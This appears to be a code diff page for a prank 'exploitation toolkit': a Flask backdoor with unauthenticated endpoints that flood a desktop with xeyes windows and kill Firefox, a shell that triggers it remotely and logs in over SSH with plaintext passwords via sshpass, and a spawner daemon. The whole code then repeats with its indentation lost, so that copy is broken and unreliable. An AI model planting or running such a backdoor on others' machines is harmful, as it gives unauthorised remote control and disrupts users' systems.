MilyMilo · March 16, 2022 21:17
diff --git a/backdoor.py b/backdoor.py
 from flask import Flask
 from subprocess import Popen as popen
 from time import sleep

 app = Flask(__name__)


 @app.route('/attack', methods=['POST'])
 def attack():
    # launch sub-process for launching x-eyes
    # this can be killed by killing 'spawnerd' without killing backdoor
    popen(["./spawnerd", "0.5"])
    return "OK\r\n"


 @app.route('/firefox', methods=['POST'])
 def firefox():
    popen(["killall", "firefox"])
    return "OK\r\n"


 @app.route('/defend', methods=['POST'])
 def defend():
    # kill the spawner and all remaining xeyes
    popen(['killall', 'spawnerd', 'xeyes'])
    return "OK\r\n"
diff --git a/requirements.txt b/requirements.txt
 certifi==2019.3.9
 chardet==3.0.4
 Click==7.0
 colorama==0.4.1
 Flask==1.0.2
 idna==2.8
 itsdangerous==1.1.0
 Jinja2==2.10
 MarkupSafe==1.1.1
 python-prctl==1.7
 requests==2.21.0
 urllib3==1.24.1
 Werkzeug==0.14.1
diff --git a/shell.py b/shell.py
 import signal
 import requests
 from subprocess import call, Popen as popen
 from colorama import Fore, Back


 class Command:
    """Command wraps subprocess calls with additional identification and argument validation"""

    def __init__(self, name: str, arg_map: list, func: callable):
        """
        name: name of the command as saved in the shell cmd list
        arg_map: positional type mapping eg. [str, int]
        func: callable to be called if args match, base command
        """
        self.name = name
        self.arg_map = arg_map
        self.func = func

    def isValid(self, args: list) -> bool:
        # Length check
        if len(args) != len(self.arg_map):
            return False

        # Type Check
        for i in range(len(args)):
            try:
                if not isinstance(args[i], self.arg_map[i]):
                    return False
            except KeyError:
                return False
        return True


 class Shell:
    """Shell is the entry object wrapping commands with flow control"""

    def __init__(self, command_map: dict, motd: str, prompt: str):
        """
        command_map: mapping of names to command objects
        motd: message displayed on shell startup
        prompt: shell prompt displayed when it's ready to accept input
        """

        self.command_map = command_map
        self.motd = motd
        self.prompt = prompt

        self._exit = False
        self._shell_commands = ["exit", "rm"]

        signal.signal(signal.SIGINT, self._dummy_handler)

    def run(self):
        print(self.motd)
        while not self._exit:
            args = input(self.prompt).strip().split()
            command, params = args[0], args[1:]

            if command in self._shell_commands:
                self._internal(command)
                continue

            cmd = self.command_map.get(command)

            # either it doesn't exist or args were messed up
            if cmd is None or not cmd.isValid(params):
                print("Invalid input, just like you.")
                continue

            # At this point, params must be in sync with what cmd.func() expects
            # So it's safe to just drop them there and handle rest in command
            cmd.func(params)

    def _internal(self, command: str):
        if command == "exit":
            self._exit = True
            return

        if command == "rm":
            return print("LOL, NO")

    @staticmethod
    def _dummy_handler(sig, frame):
        pass


 def ssh(args):
    hostname, username, password, port = args[0], args[1], args[2], args[3]
    ssh = popen(["sshpass", "-p", password, "ssh", "{}@{}".format(username, hostname), "-p", port])
    ssh.communicate()


 def main():
    motd = "SCI@RED EXPLOITATION TOOLKIT \nRESPONSIBLE USAGE ASSUMED, PROCEED AT YOUR OWN RISK \nYOU'VE BEEN WARNED"
    prompt = "{blue}SCI{red}@RED{res}> ".format(blue=Fore.BLUE, red=Fore.RED, res=Fore.RESET)
    commands = {
        "ls": Command("ls", [str], lambda args: call(["ls", args[0]])),
        "cat": Command("cat", [str], lambda args: call(["cat", args[0]])),
        "connect": Command("connect", [str, str, str, str], ssh),
        "attack": Command("attack", [str], lambda args: requests.post("http://{}:5000/attack".format(args[0]), data={})),
        "defend": Command("defend", [], lambda _: call(["killall", "spawnerd", "xeyes"]))
    }

    sh = Shell(commands, motd, prompt)
    sh.run()


 if __name__ == "__main__":
    main()
diff --git a/spawnerd b/spawnerd
 #!/usr/bin/env python3

 import subprocess
 from sys import argv
 from time import sleep
 from prctl import set_name as set_process_name


 def init():
    # Failsafe to kill all remaining spawner daemons
    # this kills every but last daemon which, should be the current one
    instances = get_pid("spawnerd")[0:-1]
    if len(instances) > 0:
        subprocess.call(["kill"] + instances)

    # This makes sure killall can find the process
    set_process_name("spawnerd")


 def get_pid(name):
    # pgrep over pidof, because it was missing processes from other shells (I assume)
    child = subprocess.Popen(['pgrep', '-f', name], stdout=subprocess.PIPE, shell=False)
    response = child.communicate()[0]
    return [pid for pid in response.split()]


 if __name__ == "__main__":
    init()
    delay = float(argv[1])
    while True:
        subprocess.Popen(["xeyes"])
        sleep(delay)
	from flask import Flask
	from subprocess import Popen as popen
	from time import sleep

	app = Flask(__name__)


	@app.route('/attack', methods=['POST'])
	def attack():
	# launch sub-process for launching x-eyes
	# this can be killed by killing 'spawnerd' without killing backdoor
	popen(["./spawnerd", "0.5"])
	return "OK\r\n"


	@app.route('/firefox', methods=['POST'])
	def firefox():
	popen(["killall", "firefox"])
	return "OK\r\n"


	@app.route('/defend', methods=['POST'])
	def defend():
	# kill the spawner and all remaining xeyes
	popen(['killall', 'spawnerd', 'xeyes'])
	return "OK\r\n"
	certifi==2019.3.9
	chardet==3.0.4
	Click==7.0
	colorama==0.4.1
	Flask==1.0.2
	idna==2.8
	itsdangerous==1.1.0
	Jinja2==2.10
	MarkupSafe==1.1.1
	python-prctl==1.7
	requests==2.21.0
	urllib3==1.24.1
	Werkzeug==0.14.1
	import signal
	import requests
	from subprocess import call, Popen as popen
	from colorama import Fore, Back


	class Command:
	"""Command wraps subprocess calls with additional identification and argument validation"""

	def __init__(self, name: str, arg_map: list, func: callable):
	"""
	name: name of the command as saved in the shell cmd list
	arg_map: positional type mapping eg. [str, int]
	func: callable to be called if args match, base command
	"""
	self.name = name
	self.arg_map = arg_map
	self.func = func

	def isValid(self, args: list) -> bool:
	# Length check
	if len(args) != len(self.arg_map):
	return False

	# Type Check
	for i in range(len(args)):
	try:
	if not isinstance(args[i], self.arg_map[i]):
	return False
	except KeyError:
	return False
	return True


	class Shell:
	"""Shell is the entry object wrapping commands with flow control"""

	def __init__(self, command_map: dict, motd: str, prompt: str):
	"""
	command_map: mapping of names to command objects
	motd: message displayed on shell startup
	prompt: shell prompt displayed when it's ready to accept input
	"""

	self.command_map = command_map
	self.motd = motd
	self.prompt = prompt

	self._exit = False
	self._shell_commands = ["exit", "rm"]

	signal.signal(signal.SIGINT, self._dummy_handler)

	def run(self):
	print(self.motd)
	while not self._exit:
	args = input(self.prompt).strip().split()
	command, params = args[0], args[1:]

	if command in self._shell_commands:
	self._internal(command)
	continue

	cmd = self.command_map.get(command)

	# either it doesn't exist or args were messed up
	if cmd is None or not cmd.isValid(params):
	print("Invalid input, just like you.")
	continue

	# At this point, params must be in sync with what cmd.func() expects
	# So it's safe to just drop them there and handle rest in command
	cmd.func(params)

	def _internal(self, command: str):
	if command == "exit":
	self._exit = True
	return

	if command == "rm":
	return print("LOL, NO")

	@staticmethod
	def _dummy_handler(sig, frame):
	pass


	def ssh(args):
	hostname, username, password, port = args[0], args[1], args[2], args[3]
	ssh = popen(["sshpass", "-p", password, "ssh", "{}@{}".format(username, hostname), "-p", port])
	ssh.communicate()


	def main():
	motd = "SCI@RED EXPLOITATION TOOLKIT \nRESPONSIBLE USAGE ASSUMED, PROCEED AT YOUR OWN RISK \nYOU'VE BEEN WARNED"
	prompt = "{blue}SCI{red}@RED{res}> ".format(blue=Fore.BLUE, red=Fore.RED, res=Fore.RESET)
	commands = {
	"ls": Command("ls", [str], lambda args: call(["ls", args[0]])),
	"cat": Command("cat", [str], lambda args: call(["cat", args[0]])),
	"connect": Command("connect", [str, str, str, str], ssh),
	"attack": Command("attack", [str], lambda args: requests.post("http://{}:5000/attack".format(args[0]), data={})),
	"defend": Command("defend", [], lambda _: call(["killall", "spawnerd", "xeyes"]))
	}

	sh = Shell(commands, motd, prompt)
	sh.run()


	if __name__ == "__main__":
	main()
	#!/usr/bin/env python3

	import subprocess
	from sys import argv
	from time import sleep
	from prctl import set_name as set_process_name


	def init():
	# Failsafe to kill all remaining spawner daemons
	# this kills every but last daemon which, should be the current one
	instances = get_pid("spawnerd")[0:-1]
	if len(instances) > 0:
	subprocess.call(["kill"] + instances)

	# This makes sure killall can find the process
	set_process_name("spawnerd")


	def get_pid(name):
	# pgrep over pidof, because it was missing processes from other shells (I assume)
	child = subprocess.Popen(['pgrep', '-f', name], stdout=subprocess.PIPE, shell=False)
	response = child.communicate()[0]
	return [pid for pid in response.split()]


	if __name__ == "__main__":
	init()
	delay = float(argv[1])
	while True:
	subprocess.Popen(["xeyes"])
	sleep(delay)